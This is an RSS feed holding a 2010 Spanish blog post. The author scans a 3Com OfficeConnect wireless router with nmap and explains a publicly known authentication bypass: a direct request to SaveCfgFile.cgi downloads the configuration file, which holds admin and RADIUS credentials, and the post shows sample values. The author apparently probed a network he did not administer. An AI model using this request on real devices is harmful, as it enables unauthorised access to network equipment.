<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>HiperGalaxia &#187; Router</title>
	<atom:link href="http://www.hipergalaxia.org/blog/tag/router/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.hipergalaxia.org/blog</link>
	<description>El conocimiento, la frontera final.</description>
	<lastBuildDate>Mon, 06 Sep 2010 01:53:24 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Problemas de autenticación/autorización de un 3Com OfficeConnect Wireless Router</title>
		<link>http://blog.jorgeivanmeza.com/2010/01/problemas-de-autenticacionautorizacion-de-un-3com-officeconnect-wireless-router/</link>
		<comments>http://blog.jorgeivanmeza.com/2010/01/problemas-de-autenticacionautorizacion-de-un-3com-officeconnect-wireless-router/#comments</comments>
		<pubDate>Mon, 18 Jan 2010 05:22:02 +0000</pubDate>
		<dc:creator>jimezam</dc:creator>
				<category><![CDATA[Sindicados]]></category>
		<category><![CDATA[3Com]]></category>
		<category><![CDATA[hardware]]></category>
		<category><![CDATA[Hipergalaxia]]></category>
		<category><![CDATA[Internet]]></category>
		<category><![CDATA[Router]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>

		<guid isPermaLink="false">http://blog.jorgeivanmeza.com/?p=2351</guid>
		<description><![CDATA[Introducción.
El viernes pasado mientras aprendía acerca de Team Software Process se me ocurrió echar una mirada para intentar encontrar la dirección del filtro de contenido de la red que en la que estaba que la hacía prácticamente inútil bloqueando la mayoría de los sitios web de interés general.
Un traceroute de los sitios bloqueados no me [...]]]></description>
			<content:encoded><![CDATA[<h2>Introducción.</h2>
<p><a href="http://blog.jorgeivanmeza.com/wp-content/uploads/2010/01/prd_lg_3crwe554g72.gif"><img class="alignleft size-full wp-image-2352" title="prd_lg_3crwe554g72" src="http://blog.jorgeivanmeza.com/wp-content/uploads/2010/01/prd_lg_3crwe554g72.gif" alt="" width="210" height="119" /></a>El viernes pasado mientras aprendía acerca de <a href="http://en.wikipedia.org/wiki/Team_Software_Process" >Team Software Process</a> se me ocurrió echar una mirada para intentar encontrar la dirección del filtro de contenido de la red que en la que estaba que la hacía prácticamente inútil bloqueando la mayoría de los sitios web de interés general.</p>
<p>Un <em>traceroute</em> de los sitios bloqueados no me mostró la ubicación que quería, sólo permitía llegar hasta el enrrutador inalámbrico que me estaba permitiendo acceder a la red LAN.  Decepcionado terminé saludándolo para darme cuenta de un problema de seguridad que ocultaba.</p>
<h2>Conociendo al dispositivo.</h2>
<p>Inicialmente no me dijo mucho, sólo que aparentemente era un dispositivo 3Com (o al menos su interfaz de red lo era).</p>
<p><span style="font-family: courier new,courier;">$ sudo nmap -sA -O 192.168.2.1</span></p>
<p style="padding-left: 30px;"><span style="font-family: courier new,courier;">Starting Nmap 5.00 ( http://nmap.org ) at 2010-01-16 08:10 COT<br />
All 1000 scanned ports on 192.168.2.1 are unfiltered<br />
MAC Address: </span><span style="font-family: courier new,courier;">00:FF:C1:4D:FF:EE</span><span style="font-family: courier new,courier;"><span style="font-family: courier new,courier;"> (<strong><span style="color: #ff0000;">3co</span></strong></span><strong><span style="color: #ff0000;">m Europe</span></strong>)<br />
Too many fingerprints match this host to give specific OS details<br />
Network Distance: 1 hop</span></p>
<p>Posteriormente lo confirmé al ver que el dispositivo 3Com ejecutaba aparentemente una versión de Linux con el kernel 2.6 lo cual es relativamente reciente.</p>
<p><span style="font-family: courier new,courier;">$ sudo nmap -sS -O 192.168.2.1</span></p>
<p style="padding-left: 30px;"><span style="font-family: courier new,courier;">Starting Nmap 5.00 ( http://nmap.org ) at 2010-01-16 08:09 COT<br />
Interesting ports on 192.168.2.1:<br />
Not shown: 998 closed ports<br />
PORT   STATE SERVICE<br />
53/tcp open  domain<br />
<span style="color: #ff0000;"><strong>80/tcp open  http</strong></span><br />
MAC Address: 00:FF:C1:4D:FF:EE (<strong><span style="color: #ff0000;">3com Europe</span></strong>)<br />
Device type: general purpose<br />
<span style="color: #ff0000;"><strong>Running: Linux 2.6.X<br />
OS details: Linux 2.6.22</strong></span><br />
Network Distance: 1 hop</span></p>
<p>También se hizo evidente que el dispositivo permitía su administración a través de web (puerto 80).</p>
<p>Accediendo a el dispositivo utilizando un navegador web encontré que era finalmente un <strong>3Com OfficeConnect Wireless 11g</strong>.  Sabiendo esto investigué un poco si había problemas conocidos con este dispositivo.</p>
<h2>La vulnerabilidad.</h2>
<p>Resulta que estos dispositivos manejan incorrectamente la autenticación/autorización de su módulo web de administración, protegiendo correctamente a las páginas pero permitiendo el acceso directo a los CGIs.  Esto unido a que el método de copia de seguridad de la configuración del router genera un archivo (<span style="font-family: courier new,courier;">config.bin</span>) con esta información y lo almacena en su memoria interna para que el administrador lo descargue, termina convirtiéndose en un grave problema de seguridad.</p>
<p>El archivo puede descargarse mediante un CGI llamado <span style="font-family: courier new,courier;">SaveCfgFile</span> así que para obtenerlo sólo es necesario acceder a él mediante un navegador web.</p>
<p style="padding-left: 30px;"><span style="font-family: courier new,courier;">http://192.168.2.1/SaveCfgFile.cgi</span></p>
<p>El archivo contiene <span style="text-decoration: underline;">toda</span> la configuración del enrrutador, incluyendo su información de red y contraseñas de administración!</p>
<p style="padding-left: 30px;"><span style="font-family: courier new,courier;">&#8230;<br />
httpd_username=admin<br />
httpd_password=admin<br />
&#8230;<br />
mradius_username=admin<br />
mradius_password=admin<br />
mradius_secret=mradius1218<br />
mradius_port=1812<br />
&#8230;<br />
http_username=admin<br />
login_password=admin<br />
http_passwd=admin<br />
&#8230;</span></p>
<h2>Conclusiones.</h2>
<p>Esta vulnerabilidad fue reportada a 3Com por Luca Carettoni de ikkisoft.com en diciembre de 2008 y fue conocida por el público en general en febrero del 2009.</p>
<p>Supongo que desde hace tanto tiempo para acá 3Com ya ha solucionado esta vulnerabilidad y se encuentra disponible una actualización del firmware que la soluciona.</p>
<p>Debe tenerse especial cuidado en los dispositivos que tengan la opción de <em>Remote Administration</em> activa ya que esta vulnerabilidad podrá ser explotada desde Internet.</p>
<h2>Enlaces.</h2>
<ul>
<li>3Com OfficeConnect Wireless Cable/DSL Router Authentication Bypass.<br />
<a href="http://packetstormsecurity.org/0902-exploits/LC-2008-05.txt" >http://packetstormsecurity.org/0902-exploits/LC-2008-05.txt</a></li>
<li>3Com® OfficeConnect® Wireless 11g Cable/DSL Gateway.<br />
<a href="http://www.3com.com/products/en_US/detail.jsp?tab=features&amp;sku=3CRWE554G72&amp;pathtype=support" >http://www.3com.com/products/en_US/detail.jsp?tab=features&amp;sku=3CRWE554G72&amp;pathtype=support</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://blog.jorgeivanmeza.com/2010/01/problemas-de-autenticacionautorizacion-de-un-3com-officeconnect-wireless-router/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
